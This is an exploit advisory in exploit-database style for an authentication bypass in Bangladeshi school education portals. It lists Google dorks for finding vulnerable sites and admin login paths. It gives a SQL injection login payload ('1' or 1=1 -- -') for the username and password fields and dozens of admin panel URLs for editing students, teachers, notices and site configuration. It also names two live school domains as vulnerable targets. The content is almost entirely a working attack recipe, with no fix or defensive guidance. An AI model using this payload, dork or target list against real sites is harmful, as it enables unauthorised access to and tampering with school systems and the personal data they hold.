facebook facebook twitter rss

Rubel Chandra Shil Mirsarai Chittagong Muktagachha Mymensingh Bypass Vulnerability

Author: KingSkrupellos , Published: 09-10-2018
#################################################################################################

# Exploit Title : Rubel Chandra Shil Mirsarai Chittagong Muktagachha Mymensingh Authentication Bypass Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 10/10/2018
# Vendor Homepage : mymensingh.gov.bd ~ chittagong.gov.bd
# Tested On : Windows and Linux
# Google Dorks :
intext:''পরিকল্পনা ও বাস্তবায়নে : মো. নজরুল ইসলাম, মুক্তাগাছা, ময়মনসিংহ।'' site:edu.bd
intext:পরিকল্পনা ও বাস্তবায়নে : মো. নজরুল ইসলাম, মুক্তাগাছা, ময়মনসিংহ।'' site:edu.bd
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592 [ Authentication Bypass Issues ]

#################################################################################################

# Exploit Title =>

Planning and Implementing Rubel Chandra Shil Mirsarai Chittagong Bangladesh Education Portals Authentication Bypass Vulnerability

Planning and implementing: Md. Nazrul Islam, Muktagachha, Mymensingh Education Portals Authentication Bypass Vulnerability

# Admin Panel Login Path :

/administrator/login.php
/administrator/index.php

# Authentication Bypass Exploit :

Admin Username : 1' or 1=1 -- -

Admin Password : 1' or 1=1 -- -

# Useable Admin Control Panel URL Links :

# Exploits for Authentication Bypass =>

/administrator/index.php?option=oneView&direction=list
/administrator/index.php?option=oneview&direction=entry
/administrator/index.php?option=firstPage&direction=entry
/administrator/index.php?option=infrastructure&direction=list
/administrator/index.php?option=infrastructure&direction=entry
/administrator/index.php?option=infrastructure&&direction=edit&&id=1
/administrator/index.php?option=committee&direction=list
/administrator/index.php?option=committee&&direction=edit&&id=1
/administrator/index.php?option=committee&direction=entry
/administrator/index.php?option=committee&direction=list
/administrator/index.php?option=committee&direction=entry
/administrator/index.php?option=principal&direction=list
/administrator/index.php?option=principal&direction=entry
/administrator/index.php?option=teacher&direction=list
/administrator/index.php?option=teacher&direction=entry
/administrator/index.php?option=student&direction=list
/administrator/index.php?option=student&direction=entry
/administrator/index.php?option=studentAchievement&direction=list
/administrator/index.php?option=studentAchievement&direction=entry
/administrator/index.php?option=curriculum&direction=list
/administrator/index.php?option=curriculum&direction=entry
/administrator/index.php?option=cocurriculum&direction=list
/administrator/index.php?option=cocurriculum&direction=entry
/administrator/index.php?option=cocurriculum&&direction=edit&&id=1
/administrator/index.php?option=coCurriculum&direction=list
/administrator/index.php?option=coCurriculum&direction=entry
/administrator/index.php?option=calander&direction=list
/administrator/index.php?option=calander&direction=entry
/administrator/index.php?option=holiday&direction=list
/administrator/index.php?option=holiday&direction=entry
/administrator/index.php?option=contact&direction=list
/administrator/index.php?option=contact&direction=entry
/administrator/index.php?option=library&direction=list
/administrator/index.php?option=library&direction=entry
/administrator/index.php?option=links&direction=list
/administrator/index.php?option=links&direction=entry
/administrator/index.php?option=links&&direction=edit&&id=1
/administrator/index.php?option=download&direction=list
/administrator/index.php?option=download&direction=entry
/administrator/index.php?option=notice&direction=list
/administrator/index.php?option=notice&&direction=edit&&id=1
/administrator/index.php?option=notice&direction=entry
/administrator/index.php?option=notice&direction=list
/administrator/index.php?option=notice&&direction=edit&&id=1
/uploads/school_notice_[RANDOM-NUMBER].jpg .gif .png
/administrator/index.php?option=latest&direction=list
/administrator/index.php?option=latest&direction=entry
/administrator/index.php?option=latest&&direction=edit&&id=1
/administrator/index.php?option=classRoutine&direction=list
/administrator/index.php?option=classRoutine&direction=entry
/administrator/index.php?option=slider&direction=list
/administrator/index.php?option=slider&&direction=edit&&id=2
/administrator/index.php?option=slider&direction=entry
/slider/slider/....
/administrator/index.php?option=gallery&direction=list
/administrator/index.php?option=gallery&&direction=edit&&id=1
/administrator/index.php?option=gallery&direction=entry
/uploads/gallery/school_gallery_images_[RANDOM-NUMBER].jpg .gif .png
/administrator/index.php?option=siteconfig&direction=edit&id=1

# Example Vulnerable Sites =>

ghpngh.edu.bd => [ Proof of Concept ] => archive.is/vyRpF

jhaljhaliaesk.edu.bd => [ Proof of Concept ] => archive.is/5sc7n

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

# CXSecurity : cxsecurity.com/ascii/WLB-2018100091

#################################################################################################

Like us on Facebook :